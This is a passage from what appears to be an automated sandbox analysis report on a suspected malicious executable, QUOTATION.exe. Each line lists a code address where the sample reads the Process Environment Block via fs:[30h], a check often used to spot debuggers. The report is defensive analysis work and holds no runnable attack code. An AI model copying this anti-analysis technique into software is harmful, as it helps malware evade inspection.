          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3374510F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3374510F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3374510F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3374510F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3374510F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3374510F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3374510F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3374510F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3374510F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3374510F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3372510D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337191F0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337191F0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337301F1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337301F1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337301F1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3374F1F0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3374F1F0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337E81EE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337E81EE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3372A1E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3372A1E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3372A1E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3372A1E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3372A1E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3374B1E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3374B1E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3374B1E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3374B1E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3374B1E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3374B1E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3374B1E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337291E5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337291E5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337181EB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337301C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337301C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337351C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337351C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337351C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337351C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337531BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337531BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337541BB mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337541BB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337541BB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3375E1A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3375E1A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33749194 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33761190 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33761190 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33724180 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33724180 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33724180 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33727072 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33726074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33726074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337C9060 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33721051 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33721051 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337F505B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33750044 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337A6040 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371D02D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33762010 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33745004 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33745004 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33728009 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3375D0F0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3375D0F0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371C0F6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337190F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337190F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337190F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337190F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337AC0E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3373B0D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371B0D6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371B0D6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371B0D6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371B0D6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337F50B7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337DB0AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337600A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337CF0A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337CF0A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337CF0A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337CF0A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337CF0A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337CF0A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337CF0A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337A60A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337A60A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337A60A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337A60A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337A60A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337A60A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337A60A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371C090 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371A093 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337A7090 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337F4080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337F4080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337F4080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337F4080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337F4080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337F4080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337F4080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33750774 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33724779 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33724779 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33732760 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33761763 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33761763 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33761763 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33761763 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33761763 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33761763 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33742755 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33742755 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33742755 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33742755 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33742755 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33742755 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3375A750 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371F75B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371F75B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371F75B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371F75B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371F75B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371F75B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371F75B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371F75B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371F75B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337CE750 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337A174B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337A174B mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33753740 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3375174A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33749723 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3372471B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3372471B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337DF717 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3372D700 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371B705 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371B705 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371B705 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371B705 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337E970B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337E970B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3374270D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3374270D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3374270D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337277F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337277F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3374E7E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337237E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337237E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337237E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337237E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337237E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337237E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337237E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337DF7CF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337F17BC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337207A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337ED7A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337ED7A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337ED7A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33751796 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33751796 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3379E79D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3379E79D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3379E79D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3379E79D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3379E79D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3379E79D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3379E79D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3379E79D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3379E79D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337FB781 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337FB781 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33720670 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33762670 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33762670 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33717662 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33717662 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33717662 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33733660 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33733660 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33733660 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337A166E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337A166E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337A166E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3375666D mov esi, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3375666D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3375666D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337AE660 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33755654 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3372965A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3372965A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3375265C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3375265C mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3375265C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33723640 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3373F640 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3373F640 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3373F640 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3375C640 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3375C640 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371D64A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371D64A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33720630 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33750630 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337A8633 mov esi, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337A8633 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337A8633 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3375F63F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3375F63F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337CD62C mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337CD62C mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337CD62C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33725622 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33725622 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33727623 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3375C620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337B3608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337B3608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337B3608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337B3608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337B3608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337B3608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3374D600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3374D600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337A9603 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337DF607 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3375360F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337F4600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3379C6F2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3379C6F2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337196E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337196E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3372C6E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337256E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337256E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337256E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337466E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337466E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3374D6D0 mov eax, dword ptr fs:[00000030h]
